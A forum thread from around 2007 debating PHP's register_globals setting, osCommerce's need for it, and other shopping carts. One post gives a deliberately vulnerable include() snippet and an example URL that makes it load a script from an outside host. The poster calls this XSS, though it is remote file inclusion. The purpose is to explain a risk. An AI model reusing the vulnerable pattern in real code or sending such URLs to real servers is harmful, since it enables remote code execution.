register_globals on or off ??
i have up untill now had register_globals = on, but am now changing it to off
here's my question
every post i see tells me that having register_globals = on is a major security issue, however osCommerce requires it to be on, does this mean that osCommerce is insecure or is having register globals = on not such a security issue.
im confused
Requiring register_globals is commonly accepted as being very poor programming practice among PHP coders. Enabling register_globals is a security risk from the perspective of the system administrators. In fact, some PHP apps now will refuse to function in an environment where register_globals is on due to the security risk.
Generally the advice is that if a PHP application requires register_globals, you may want to consider another PHP application.
Also, many PHP coders are beginning to prepare for PHP 6, where register_globals will no longer be available. If something is still requiring register_globals, it's a bit behind the times as far as PHP coding standards go.
i would have thought osCommerce (being one of the most popular shopping carts) would have been pretty safe to use but maybe its not the best ??
I recently wrote up an article concerning this.
In regards to osCommerce, I just think their developers have fallen asleep. Is the project even being actively developed any more?
I would really be afraid to use osCommerce, because if they are willing to ignore the issue such as register_globals, what other issues are they ignoring? Do you really feel safe knowing that your e-commerce website is handled by such a piece of software? What if a major, major vulnerability is found in osCommerce, are they going to sit on their hands for 10 years before releasing a fix?
This isn't to say that having register_globals disabled will instantly bring you a ton of extra security. Its also not to say that by writing a script that requires register_globals to be enabled is a security flaw. But the common conception regarding register_globals is that it should be turned off. Script developers should be aware of this and should have already adjusted their scripts to function in this manner.
Here's my 0.02:
globals themselves are not bad, as long as you secure them. The problem is that wanna be coders get in there and write crappy scripts cheaply , and decide 'hey, we're just not going to secure our globals at all'. This (of course) leads to hacking, problems, and just all around bad things.
Now, should they be required on or off? Well, as of php6, you won't have a choice. Thank the gods that's not for a while, but still, it'll happen, eventually. Personally, I'm still getting ready for that day (I do use a few globals, properly secured, of course), but it'll be a bloody nightmare when everything gets there.
Personally, I say leave 'em on ,for now. When PHP makes you turn 'em off, do so, but not until. Otherwise, this will cause some HUGE problems with pretty common software.
Linux Tech Networks: Reliable Server Administration and Monitoring since 2002
Note that globals (global variables) is a completely different thing from register_globals. Anyone who is spending enough time to secure their PHP scripts will likely spend a few seconds to avoid the need for register_globals.Originally Posted by twhiting9275
If you're not familiar with global variables from a programming standpoint, here's a link to the Wikipedia article on it:
http://en.wikipedia.org/wiki/Global_variable
In PHP, register_globals allows any parameter passed to the script to be assigned to a global variable (including overwriting the values of existing global variables, hence the danger of this setting). Let's say you have this PHP script named exploit_me.php:
Now lets say you call this URL:PHP Code:// Warning: never code like this in a register_globals environment
$include_file = "myinclude.inc";
// Note the lack of anything polling GET or POST variables explicitly.
include($include_file);
My XSS script would then run on your server since you have register_globals enabled and I'm overwriting the include_file global variable with my own data.Code:http://yourDomain.com/exploit_me.php?include_file=http://myDomain.com/xss.php
While this is an obvious example, don't expect the this to be as obvious in many scripts. How do people know what variables you are using? Well most scripts people use are open source so you can just look at the source.
I hope this clears some misconceptions of register_globals vs. PHP global variables.
Last edited by cPanelDavidG; 12-03-2007 at 09:28 AM. Reason: So you can see the full URL being called.
Hello,
Instead of setting the variable register_globals = on you ned to apply the patch at the URL http://www.oscommerce.com/community/contributions,2097.
Once it is applied,, register_globals MUST be disabled otherwise it will not work.
Regards,
Bibin
Jr. Systems Engineer
http://SupportPRO.com :: Transparent Web Hosting Support Services to Web Hosting Businesses ..
A while back, I had the misfortune of having to set up oscommerce for customers, including trying to integrate add-ons. The code nearly made me scream in horror.
I have heard good stuff about Zen Cart, which I believe is similar. I haven't looked at it in depth, though. You should probably take a look at it. And if you're a Drupal fan, there's the e-Commerce modules, as well as the Ubercart system.
LinkBack URL
About LinkBacks
Reply With Quote